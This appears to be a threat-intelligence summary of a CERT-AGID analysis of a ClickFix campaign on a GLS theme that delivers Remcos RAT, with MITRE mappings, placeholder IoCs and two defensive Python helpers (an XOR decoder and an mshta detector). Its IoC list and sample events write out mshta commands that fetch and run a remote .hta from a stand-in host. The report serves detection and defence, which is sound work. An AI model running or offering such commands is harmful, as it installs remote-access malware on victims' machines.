Analysis of Remcos RAT Distributed in Italy with ClickFix Campaign on GLS Theme

A large-scale malspam campaign is using GLS-branded emails with an attached XHTML file that decodes XOR-obfuscated JavaScript and redirects victims to a Netlify-hosted phishing site. The site uses the ClickFix social-engineering technique to trick users into pasting and running a command in a terminal. Analysis of the downloaded binary found a SETTINGS resource matching the Remcos RAT configuration format, indicating likely Remcos-based remote access and data-stealing activity. #Remcos

Keypoints

  • The campaign uses GLS-themed malspam with the subject “Invalid address, please fill out form 8900395” to lure victims.
  • An attached XHTML contains XOR-obfuscated JavaScript that redirects users to a malicious Netlify domain.
  • The phishing site impersonates the GLS portal and employs ClickFix social engineering to get users to paste and run commands.
  • Victims are tricked by a fake CAPTCHA into running an mshta command that loads a remote .hta file with a variable parameter.
  • The .hta is fully obfuscated with XOR decoding and launches a payload that downloads and executes a binary from a secondary domain.
  • Preliminary binary analysis found a SETTINGS resource consistent with Remcos RAT, suggesting remote access and payload execution capabilities.
  • CERT-AGID has shared IoCs with accredited organizations; public IoCs were referenced for wider dissemination.
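The attachment described above carries its redirect as XOR-obfuscated JavaScript that a small loader decodes at open time. The following triage helper is an added example written for this summary, not code from CERT-AGID or from the campaign: it takes the numeric byte array such a loader embeds, tries every single-byte XOR key, scores each candidate plaintext for JavaScript and redirect markers, and pulls out the URL the decoded stub redirects to. The sample array, its key (0x5A) and the `example-lure.netlify.app` host are constructed for the example and are not indicators from the report.

```python
"""Triage helper for XOR-obfuscated JavaScript inside an XHTML lure.

Given the numeric byte array that a lure's loader script feeds to its
decoder, try every single-byte key, score each candidate for JavaScript
and redirect markers, and report the best decode plus the URLs it contains.
"""
import re

# Substrings that distinguish a decoded redirect stub from XOR noise.
JS_MARKERS = (b"window.location", b"document", b"href", b"http", b"function", b"var ")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte."""
    return bytes(b ^ key for b in data)


def printable_ratio(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not buf:
        return 0.0
    ok = sum(1 for b in buf if 32 <= b < 127 or b in b"\r\n\t")
    return ok / len(buf)


def score(candidate: bytes) -> int:
    """Reject mostly non-printable output, then count JavaScript markers."""
    if printable_ratio(candidate) < 0.95:
        return 0
    return sum(candidate.count(m) for m in JS_MARKERS)


def brute_force_xor(data: bytes):
    """Return (key, plaintext, score) for the best-scoring single-byte key."""
    best = (None, b"", 0)
    for key in range(256):
        cand = xor_bytes(data, key)
        s = score(cand)
        if s > best[2]:
            best = (key, cand, s)
    return best


def extract_redirect(data: bytes) -> dict:
    """Decode the array and list every URL found in the best candidate."""
    key, plain, s = brute_force_xor(data)
    urls = [u.decode("ascii", "replace") for u in URL_RE.findall(plain)] if key is not None else []
    return {"key": key, "score": s, "urls": urls, "plaintext": plain.decode("latin-1")}


# Constructed sample (not from the real attachment): a redirect stub XOR-encoded
# with key 0x5A, the way a loader would embed it as a numeric array.
_SAMPLE_JS = b'var u="https://example-lure.netlify.app/";window.location.href=u;'
SAMPLE_ARRAY = [b ^ 0x5A for b in _SAMPLE_JS]

if __name__ == "__main__":
    result = extract_redirect(bytes(SAMPLE_ARRAY))
    print(f"key=0x{result['key']:02x} score={result['score']}")
    for u in result["urls"]:
        print("redirect ->", u)
```

The marker scoring is what makes this usable on unknown samples: any key produces some output, but only the right one yields text containing `window.location`, `href` or a URL, so an analyst can go straight from the attachment to the redirect target without executing the file.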

MITRE Techniques

  • [T1566] Phishing – Malicious GLS-branded emails with subject “Invalid address, please fill out form 8900395” are used to lure recipients into opening an attached XHTML that contains obfuscated JavaScript. Quote: ‘…the emails have the subject “Invalid address, please fill out form 8900395” and contain text that simulates a communication from GLS customer service…’
  • [T1204.002] User Execution: Malicious File – The attached XHTML contains XOR-obfuscated JavaScript which, when opened by the user, decodes and redirects to the phishing site. Quote: ‘…the attachment, an XHTML file, contains JavaScript code obfuscated using XOR operations…’
  • [T1059.007] Command and Scripting Interpreter: MSHTA – The campaign instructs victims to run an mshta command that loads a remote .hta file with a parameter acting as an identifier. Quote: ‘…an mshta command is executed which calls a remote .hta file passing a parameter…’
  • [T1204.001] User Execution: Malicious Link – JavaScript decodes and redirects users to a Netlify-hosted malicious domain that impersonates the GLS portal. Quote: ‘…once decoded, it redirects the user to the malicious domain hosted on the Netlify platform.’
  • [T1204.002] User Execution: Malicious File (ClickFix social engineering) – The phishing site uses a fake CAPTCHA and social-engineering instructions to convince users to paste and execute commands, causing manual activation of malware. Quote: ‘…it uses a fake CAPTCHA to convince the user to perform seemingly legitimate actions (pasting commands…)’
  • [T1105] Ingress Tool Transfer – The .hta downloads a binary from a secondary domain which is then executed on the victim system. Quote: ‘…the payload aims to download a binary file from a secondary domain and run it on the system.’
  • [T1040] Network Sniffing / [T1020] Automated Exfiltration (tentative mapping, based on configuration extraction) – Analysis extracted a SETTINGS resource from the binary revealing C2 and agent configuration consistent with Remcos RAT, which is used for remote control and data collection. Quote: ‘…the presence of a SETTINGS resource, a typical element found in samples of Remcos RAT.’

Indicators of Compromise

  • [Domains] Malicious hosting and payload delivery – Netlify-hosted phishing domain and the secondary domain serving the binary (placeholders here; the actual values are in the referenced IoC feed).
  • [File names] Malicious attachments and payloads – XHTML attachment (placeholder: malicious_form.xhtml) and the remote .hta referenced by mshta (placeholder: payload.hta).
  • [Resources] Binary internals indicating RAT family – SETTINGS resource inside the binary matching the Remcos configuration format, plus the configuration values it holds (agent ID, C2 endpoints).
  • [Commands] Social-engineering commands executed by victims – mshta command invoking the remote .hta with a variable parameter (pattern: mshta http://…/payload.hta?ID=xxxx).
  • [Reports/Feeds] Shared IoCs – CERT-AGID IoC feed referenced (CERT-AGID IoC feed link), plus the “Download IoC” link provided in the report.
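The command pattern above is also the most reliable detection hook for this campaign on the endpoint: a user-driven mshta.exe launch whose argument is a remote URL ending in .hta with a query-string identifier. The following detection logic is an added example for this summary, not code from CERT-AGID or from any product; it runs over constructed process-creation events with generic `CommandLine`/`ParentImage` fields, flags remote mshta invocations, extracts the identifier parameter for correlation across hosts, and raises severity when the parent is an interactive shell or the Explorer Run box. The `hta-host.example` and `intranet.example` hosts are constructed placeholders, not indicators from the report.

```python
"""Detection logic for ClickFix-style mshta execution.

Scans process-creation events for mshta.exe launched with a remote URL, the
pattern the lure drives the victim to paste, and returns structured findings.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# mshta invoked by bare name or full path, followed by an http(s) URL argument.
MSHTA_REMOTE_RE = re.compile(r'(?:^|\\|\s)mshta(?:\.exe)?"?\s+"?(https?://[^\s"\']+)', re.I)

# Parents that indicate a human pasted the command (Run box, terminal) rather
# than a scheduled job or an installer.
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe", "windowsterminal.exe")


def analyse_event(event: dict) -> Optional[dict]:
    """Return a finding for a remote-URL mshta launch, else None."""
    m = MSHTA_REMOTE_RE.search(event.get("CommandLine", ""))
    if not m:
        return None
    url = m.group(1)
    parts = urlsplit(url)
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    remote_hta = parts.path.lower().endswith(".hta")
    interactive = parent in INTERACTIVE_PARENTS
    # A remote .hta is already high; an interactive parent confirms the ClickFix path.
    severity = "high" if remote_hta else ("medium" if interactive else "low")
    return {
        "url": url,
        "host": parts.netloc.lower(),
        "remote_hta": remote_hta,
        # The campaign passes a per-victim identifier; keep it for cross-host correlation.
        "identifier": {k: v[0] for k, v in parse_qs(parts.query).items()},
        "parent": parent,
        "interactive_parent": interactive,
        "severity": severity,
    }


def scan(events: list) -> list:
    """Run analyse_event over a batch and keep only the events that fire."""
    findings = []
    for idx, ev in enumerate(events):
        f = analyse_event(ev)
        if f:
            f["event_index"] = idx
            findings.append(f)
    return findings


# Constructed sample events (not real telemetry); hostnames are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta http://hta-host.example/payload.hta?ID=1234",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\ProgramData\vendor\setup.hta"',
     "ParentImage": r"C:\ProgramData\vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://intranet.example/status.html',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] event {f['event_index']}: mshta -> {f['url']} "
              f"(parent={f['parent']}, id={f['identifier']})")
```

The second sample event, a local .hta started by an installer, does not fire at all, which keeps the rule quiet on legitimate HTA use; the identifier captured from the first event is the value to pivot on when checking whether other hosts reached the same .hta.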


Read more: https://cert-agid.gov.it/news/analisi-di-remcos-rat-diffuso-in-italia-con-campagna-clickfix-a-tema-gls/